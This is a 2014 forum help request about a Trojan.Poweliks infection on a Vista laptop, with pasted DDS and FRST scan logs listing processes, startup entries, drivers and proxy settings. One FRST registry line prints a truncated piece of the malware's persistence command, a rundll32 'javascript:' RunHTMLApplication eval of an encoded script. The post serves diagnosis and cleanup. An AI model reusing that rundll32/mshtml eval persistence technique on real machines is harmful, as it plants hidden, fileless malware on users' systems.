Trojan.Poweliks with multiple dllhost.exe processes consuming memory!


  • This topic is locked
6 replies to this topic

#1 sp000ky


Posted 18 October 2014 - 05:22 PM

Like many other members, I appear to have this infection. In Task Manager, there are about 20 dllhost.exe *32 processes, and under the command line column for about ten of them it says ###CLIENT###. My computer has taken an hour to just post this. I have attached scans from DDS and FRST. I will be thrilled if someone helps. Thank you so much :) :)

 

OS: Vista

Dllhost Processes are coming from C:\Windows\syswow64 folder

 

 

DDS.txt

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 8.0.6001.19088  BrowserJavaVersion: 10.67.2
Run by Ashley at 13:23:13 on 2014-10-18
Microsoft® Windows Vista™ Home Premium   6.0.6001.1.1252.1.1033.18.4085.846 [GMT -7:00]
.
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\STacSV64.exe
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Program Files\Dell\DellDock\DockLogin.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\WLTRYSVC.EXE
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\bcmwltry.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\AESTSr64.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\ProgramData\SingleClick Systems\MySQL\bin\mysqld.exe
C:\ProgramData\SingleClick Systems\Remote Access File Sync Service\dsl_fs_sync.exe
c:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe
C:\Windows\system32\lxducoms.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
C:\Windows\System32\tcpsvcs.exe
C:\Windows\System32\snmp.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\DellTPad\Apoint.exe
C:\Windows\System32\WLTRAY.EXE
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\IDT\WDM\sttray64.exe
C:\Windows\ehome\ehtray.exe
C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe
C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\DellTPad\ApMsgFwd.exe
svchost.exe
C:\Program Files\DellTPad\HidFind.exe
C:\Program Files\DellTPad\Apntex.exe
C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
C:\Windows\system32\svchost.exe -k HPService
svchost.exe
C:\Users\Ashley\AppData\Local\Apps\2.0\KH6XP463.OY2\CW4LTZ3J.OK8\dell..tion_0f612f649c4a10af_0005.0004_3ddfe37344028d2c\DellSystemDetect.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\msiexec.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\SysWow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\system32\taskmgr.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\regsvr32.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
uWindow Title = Internet Explorer provided by Dell
uSearch Bar = hxxp://www.google.com/ie
uSearch Page = hxxp://www.google.com
uDefault_Page_URL = hxxp://www.dell.com
uDefault_Search_URL = hxxp://www.google.com/ie
mDefault_Page_URL = hxxp://www.dell.com
uProxyServer = 127.0.0.1:5222
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
mWinlogon: Userinit = C:\Windows\SysWOW64\userinit.exe,
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Lexmark Printable Web: {D2C5E510-BE6D-42CC-9F61-E4F939078474} - C:\Program Files\Lexmark Printable Web\bho.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
uRun: [Akamai NetSession Interface] "C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe"
uRun: [DellSystemDetect] C:\Users\Ashley\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell\Dell System Detect.appref-ms
uRun: [FreeRAM XP] "C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe" -win
uRun: [uTorrent] "C:\Users\Ashley\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED
mRun: [PCMService] "C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe"
mRun: [GrooveMonitor] "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
uPolicies-Explorer: NoDriveTypeAutoRun = dword:221
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:255
mPolicies-System: EnableLUA = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-Explorer: NoDriveTypeAutoRun = dword:145
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MI1933~1\Office12\EXCEL.EXE/3000
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
Trusted Zone: dell.com
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{455A3EB7-4B70-4DBC-BB5F-BFA7A628BC11} : DHCPNameServer = 192.168.42.129
TCP: Interfaces\{70A72AA5-ACC7-4118-B091-943A95985152} : DHCPNameServer = 192.168.1.1
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll
Notify: SDWinLogon - SDWinLogon.dll
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
LSA: Security Packages =  kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.101\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-mDefault_Page_URL = hxxp://www.dell.com
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-Run: [Apoint] C:\Program Files\DellTPad\Apoint.exe
x64-Run: [Broadcom Wireless Manager UI] C:\Windows\System32\WLTRAY.exe
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [SysTrayApp] C:\Program Files (x86)\IDT\WDM\sttray64.exe
x64-mPolicies-Explorer: NoActiveDesktop = dword:1
x64-mPolicies-Explorer: NoDriveTypeAutoRun = dword:255
x64-mPolicies-System: EnableLUA = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\
FF - prefs.js: browser.startup.homepage - about:home
FF - prefs.js: network.proxy.type - 0
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Virtools\3D Life Player\npvirtools.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll
.
============= SERVICES / DRIVERS ===============
.
R0 gfibto;gfibto;C:\Windows\System32\drivers\gfibto.sys [2013-7-18 14456]
R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2008-12-16 55024]
R0 SmartDefragDriver;SmartDefragDriver;C:\Windows\System32\drivers\SmartDefragDriver.sys [2014-2-13 21184]
R1 SASDIFSV;SASDIFSV;C:\Program Files\SUPERAntiSpyware\sasdifsv64.sys [2011-7-22 14928]
R1 SASKUTIL;SASKUTIL;C:\Program Files\SUPERAntiSpyware\saskutil64.sys [2011-7-12 12368]
R1 VBoxDrv;VirtualBox Service;C:\Windows\System32\drivers\VBoxDrv.sys [2011-1-19 226448]
R1 VBoxUSBMon;VirtualBox USB Monitor Driver;C:\Windows\System32\drivers\VBoxUSBMon.sys [2011-1-19 54864]
R2 npf;NetGroup Packet Filter Driver;C:\Windows\System32\drivers\npf.sys [2011-2-11 35344]
R3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;C:\Windows\System32\drivers\k57nd60a.sys [2012-9-25 440360]
R3 OA001Ufd;Creative Camera OA001 Upper Filter Driver;C:\Windows\System32\drivers\OA001Ufd.sys [2009-3-6 159840]
R3 OA001Vid;Creative Camera OA001 Function Driver;C:\Windows\System32\drivers\OA001Vid.sys [2009-3-8 319840]
R3 RLDesignVirtualAudioCableWdm;Live! Cam Virtual;C:\Windows\System32\drivers\livecamv.sys [2009-5-7 49664]
R3 VBoxNetAdp;VirtualBox Host-Only Ethernet Adapter;C:\Windows\System32\drivers\VBoxNetAdp.sys [2011-1-18 154256]
R3 VBoxNetFlt;VBoxNetFlt Service;C:\Windows\System32\drivers\VBoxNetFlt.sys [2011-1-18 173840]
S3 cpudrv64;cpudrv64;C:\Program Files (x86)\SystemRequirementsLab\cpudrv64.sys [2009-12-18 17864]
S3 HTCAND64;HTC Device Driver;C:\Windows\System32\drivers\ANDROIDUSB.sys [2009-6-10 31744]
S3 IntcHdmiAddService;Intel® High Definition Audio HDMI;C:\Windows\System32\drivers\IntcHdmi.sys [2008-9-22 126464]
S3 ManyCam;ManyCam Virtual Webcam, WDM Video Capture Driver;C:\Windows\System32\drivers\ManyCam_x64.sys [2008-3-13 27136]
S3 PSSDK42;PSSDK42;C:\Windows\System32\drivers\pssdk42.sys [2011-3-24 53312]
S3 rspLLL;rspLLL;C:\Windows\System32\drivers\rspLLL64.sys [2013-10-16 23968]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2014-7-28 54784]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\Windows\System32\drivers\wdcsam64.sys [2008-5-6 14464]
S3 WSDScan;WSD Scan Support via UMB;C:\Windows\System32\drivers\WSDScan.sys [2008-1-20 24064]
.
=============== File Associations ===============
.
FileExt: .js: JSFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M  ====================
.
2014-10-17 21:08:52 34808 ----a-w- C:\Windows\System32\drivers\TrueSight.sys
2014-10-17 17:08:04 122584 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-10-17 16:10:53 103265616 ----a-w- C:\Windows\System32\mrt.exe
2014-10-10 16:51:06 122584 ----a-w- C:\Windows\System32\drivers\48230029.sys
2014-10-09 22:41:55 0 ----a-w- C:\Windows\System32\rfbju.dll
2014-10-09 22:41:30 81408 ----a-w- C:\Windows\System32\mpcete.dll
2014-09-23 22:56:14 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-09-23 22:56:14 701104 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-09-15 16:06:02 278152 ------w- C:\Windows\System32\MpSigStub.exe
2014-08-31 07:01:11 98216 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2014-08-31 07:01:09 272808 ----a-w- C:\Windows\SysWow64\javaws.exe
2014-08-31 07:01:09 175528 ----a-w- C:\Windows\SysWow64\javaw.exe
2014-08-31 07:01:09 175528 ----a-w- C:\Windows\SysWow64\java.exe
2014-07-28 21:52:00 6112072 ----a-w- C:\Windows\System32\usbaaplrc.dll
2014-07-28 21:52:00 54784 ----a-w- C:\Windows\System32\drivers\usbaapl64.sys
.
============= FINISH: 13:30:18.22 ===============
 
 
 
FRST.txt
 
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by Ashley (administrator) on LAPTOP on 18-10-2014 14:22:29
Running from C:\Users\Ashley\Desktop
Loaded Profiles: Ashley & RA Media Server (Available profiles: Ashley & RA Media Server & Mcx1 & Games & Study & Administrator & Guest)
Platform: Windows Vista ™ Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\stacsv64.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
() C:\Windows\System32\WLTRYSVC.EXE
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Dell Inc.) C:\Windows\System32\BCMWLTRY.EXE
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\AESTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\ProgramData\SingleClick Systems\MySQL\bin\mysqld.exe
(SingleClick Systems) C:\ProgramData\SingleClick Systems\Remote Access File Sync Service\dsl_fs_sync.exe
(Dell Inc.) C:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe
( ) C:\Windows\System32\lxducoms.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corporation) C:\Windows\System32\TCPSVCS.EXE
(Microsoft Corporation) C:\Windows\System32\snmp.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(Dell Inc.) C:\Windows\System32\WLTRAY.EXE
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Akamai Technologies, Inc.) C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
(YourWare Solutions ™) C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe
(CyberLink Corp.) C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Akamai Technologies, Inc.) C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Dell) C:\Users\Ashley\AppData\Local\Apps\2.0\KH6XP463.OY2\CW4LTZ3J.OK8\dell..tion_0f612f649c4a10af_0005.0004_3ddfe37344028d2c\DellSystemDetect.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
(Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [271872 2008-07-16] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\Windows\system32\WLTRAY.exe [4119552 2008-11-17] (Dell Inc.)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [462848 2009-03-16] (IDT, Inc.)
HKLM-x32\...\Run: [PCMService] => C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [DellSystemDetect] => C:\Users\Ashley\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell\Dell System Detect.appref-ms
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [FreeRAM XP] => C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe [1591808 2006-03-23] (YourWare Solutions ™)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [uTorrent] => "C:\Users\Ashley\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\MountPoints2: {7c5292e9-9623-11df-861e-005056c00008} - J:\Autorun.exe
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [EA Core] => C:\Program Files (x86)\Electronic Arts\EADM\Core.exe -silent
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [Google Update] => "C:\Users\Ashley\AppData\Local\Google\Update\GoogleUpdate.exe" /c
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [Akamai NetSession Interface] => C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\MountPoints2: {4e39f91a-cbb5-11dd-8863-806e6f6e6963} - E:\autorun.exe
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Mcx1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\RA Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
BootExecute: autocheck autochk * sdnclean64.exe
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
ProxyServer: 127.0.0.1:5222
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
